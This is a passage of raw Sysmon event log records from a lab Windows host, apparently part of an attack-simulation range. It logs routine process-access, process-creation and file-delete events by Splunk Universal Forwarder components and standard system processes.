Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-72D3-613B-33B4-03000000C801}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.939{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72D3-613B-33B4-03000000C801}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.924{B81B27B7-72D3-613B-33B4-03000000C801}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.424{B81B27B7-72D3-613B-32B4-03000000C801}5920704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72D3-613B-32B4-03000000C801}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-72D3-613B-32B4-03000000C801}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.238{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72D3-613B-32B4-03000000C801}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.224{B81B27B7-72D3-613B-32B4-03000000C801}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:31.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=645666CA0F51A67A8E049BFBA8B2B927,SHA256=2AA03939A3B8CAACDB375E8AB1B529439839B37ADF020CE4CF0A73C2AA1F412C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72D4-613B-34B4-03000000C801}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-72D4-613B-34B4-03000000C801}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.639{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72D4-613B-34B4-03000000C801}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.624{B81B27B7-72D4-613B-34B4-03000000C801}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C175047F2BBB3F60034B1D8AB697ACC,SHA256=B8E837092C2961A155B354FEAE401A0B27D636A57DB09C067AF9745843B84E21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A9CD5379AFA7CB980996E0374E6F94A,SHA256=FE6037779209691F1098EBFAB9117F5332AC76C1F597760EF7A67C4463B5D73A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.108{B81B27B7-72D3-613B-33B4-03000000C801}60445796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:32.023{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3DF8838D357BF22526541A1184C9270,SHA256=8E514647FA4CD431013AFCB3E2B7660C317533C44D526677B63028A5D6EEA786,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:33.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C175047F2BBB3F60034B1D8AB697ACC,SHA256=B8E837092C2961A155B354FEAE401A0B27D636A57DB09C067AF9745843B84E21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:33.039{B81B27B7-4024-611D-7300-00000000C801}2188NT 